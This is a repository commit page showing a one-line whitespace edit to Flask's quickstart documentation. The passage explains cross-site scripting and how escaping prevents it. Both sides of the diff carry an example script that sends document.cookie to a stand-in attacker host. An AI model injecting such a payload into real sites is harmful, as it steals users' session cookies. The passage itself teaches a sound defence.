orbit-oss/flask
4
4
Fork 2
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update quickstart.rst

Browse source
This commit is contained in:
ahmet0033 2026-03-17 16:17:15 +03:00 committed by GitHub
parent 192e107ca9
commit 00c3980eea
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions
Download patch file Download diff file Expand all files Collapse all files

2
docs/quickstart.rst
View file

@ -148,7 +148,7 @@ how you're using untrusted data.
return f"Hello, {escape(name)}!" return f"Hello, {escape(name)}!"
For example, if a web app displays user reviews without escaping input, an attacker could submit For example, if a web app displays user reviews without escaping input, an attacker could submit
``<script>fetch('https://attacker.com?cookie=' + document.cookie);</script>``. ``<script>fetch('https://attacker.com?cookie=' + document.cookie); </script>``.
Now, any user viewing that page would unknowingly send their cookies to the attacker. Now, any user viewing that page would unknowingly send their cookies to the attacker.
This is a classic Cross-Site Scripting (XSS) attack, preventable by escaping or encoding user input before rendering. This is a classic Cross-Site Scripting (XSS) attack, preventable by escaping or encoding user input before rendering.